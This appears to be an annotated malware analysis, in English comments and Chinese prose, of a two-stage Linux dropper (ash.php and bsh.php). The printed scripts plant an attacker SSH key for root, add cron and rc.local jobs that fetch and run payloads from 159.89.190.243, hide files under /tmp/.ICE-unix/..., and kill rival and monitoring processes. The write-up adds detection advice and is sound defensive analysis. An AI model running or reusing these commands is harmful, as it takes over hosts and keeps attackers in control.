# Stage-1 dropper (ash.php) exactly as captured in the writeup. Whitespace looks
# mangled by the extraction (e.g. "2>/dev/ null", "…|bash'2>"); the lines are
# kept verbatim as evidence rather than corrected.
#
# Persistence via cron: make sure the crontab spool directory exists first.
mkdir -p /var/spool/cron/crontabs 2>/dev/ null
# Persistence via SSH: make sure root's .ssh directory exists first.
mkdir -p /root/.ssh 2>/dev/ null
# A single-quoted, multi-line RSA public key written with ">", so any existing
# authorized_keys for root is overwritten, not appended to. The key comment
# "redisX" is the only campaign hint in this file; it suggests, but does not
# prove, a Redis-related entry point. Detection: file-integrity monitoring on
# /root/.ssh/authorized_keys; during triage compare installed keys against this one.
echo 'ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0+xigBIrdgo2p5nBtrpYZ2/GN3+ThY+PNUqx
redisX'> /root/.ssh/authorized_keys
# Two root crontabs (every 15 and every 20 minutes) re-fetch ash.php over plain
# HTTP from 159.89.190.243 and pipe it to sh -- the re-infection loop that keeps
# the host compromised after a partial cleanup. Both use ">", so any legitimate
# root crontab is replaced. Detection: writes to /var/spool/cron/root and
# /var/spool/cron/crontabs/root, and cron-spawned "curl … | sh" pipelines.
echo '*/15 * * * * curl -fsSL 159.89.190.243/ash.php|sh'> /var/spool/cron/root
echo '*/20 * * * * curl -fsSL 159.89.190.243/ash.php|sh'> /var/spool/cron/crontabs/root
# Tries each package manager in turn so that bash is available for stage 2
# (the cron entries above only need sh; the next line requires bash).
yum install -y bash 2>/dev/ null
apt install -y bash 2>/dev/ null
apt-get install -y bash 2>/dev/ null
# Stage 2: fetch bsh.php from the same host and execute it under bash.
bash -c 'curl -fsSL 159.89.190.243/bsh.php|bash'2>/dev/ null
大致分析一下该脚本的主要用途:首先是关闭 SELinux,解除 Shell 资源访问限制,然后将攻击者的 SSH 公钥写入 /root/.ssh/authorized_keys 文件(使用 > 覆盖原有内容)。
这样每次黑客登录这台服务器就可以免密码登录了,执行脚本就会方便很多。
接下来写入两条定时任务(每 15/20 分钟重新拉取并执行 ash.php,以此维持驻留),再安装 Bash,最后是继续下载第二个脚本 bsh.php,并且执行。继续下载并分析 bsh.php,内容如下:
# Stage-2 script (bsh.php) as captured; spacing is mangled in places
# ("cd/tmp", "if[", "exit0", "echo1", "kill-9") and is kept verbatim.
#
# Random 3-7 second delay before doing anything; presumably jitter so that
# the cron-driven re-runs are not trivially correlated by timing (inference).
sleep $( seq 3 7 | sort -R | head -n1 )
# Work out of a world-writable temp directory.
cd/tmp || cd/var/tmp
sleep 1
# Hidden working directory ".ICE-unix/...": the parent name mimics the X11 IPC
# socket directory and "..." is easy to overlook in a listing. Made
# world-writable (777). Detection: non-socket content under /tmp/.ICE-unix or
# /var/tmp/.ICE-unix, and any directory literally named "...".
mkdir -p .ICE-unix/... && chmod -R 777 .ICE-unix && cd.ICE-unix/...
sleep 1
# Marker-file guard: if ".watch" already exists, delete it and exit; otherwise
# fall through and create it below. Net effect is that alternating invocations
# bail out -- looks like a crude rerun/mutex check, but that is an inference.
if[ -f .watch ]; then
rm -rf .watch
exit0
fi
sleep 1
# Create the marker for the next invocation to find.
echo1 > .watch
sleep 1
# Kill rival processes by name. Line 1 targets names that look like other
# Redis scanning tools; line 2 targets further competing malware names plus
# barad_agent, which appears to be a cloud host-monitoring agent (verify) --
# killing monitoring is itself a strong detection signal. The "!/awk/" clause
# only keeps awk from matching its own command line. Note the patterns are
# unanchored regexes: in ".sr0" and ".sshd" the dot matches any character, so
# ".sshd" also matches e.g. "/usr/sbin/sshd" as printed by ps, i.e. the
# legitimate SSH daemon can be killed as collateral -- worth remembering when a
# victim reports SSH dying right after infection.
ps x | awk '!/awk/ && /redisscan|ebscan|redis-cli/ {print $1}'| xargs kill-9 2>/dev/null
ps x | awk '!/awk/ && /barad_agent|masscan|.sr0|clay|udevs|.sshd|xig/ {print $1}'| xargs kill-9 2>/dev/null
sleep 1
if! [ -x /usr/bin/gpg-agentd ]; then
curl -s -o /usr/bin/gpg-agentd 159.89.190.243/dump.db
echo'/usr/bin/gpg-agentd'> /etc/rc.local
echo'curl -fsSL 159.89.190.243/ash.php|sh'>> /etc/rc.local
echo'exit 0'>> /etc/rc.local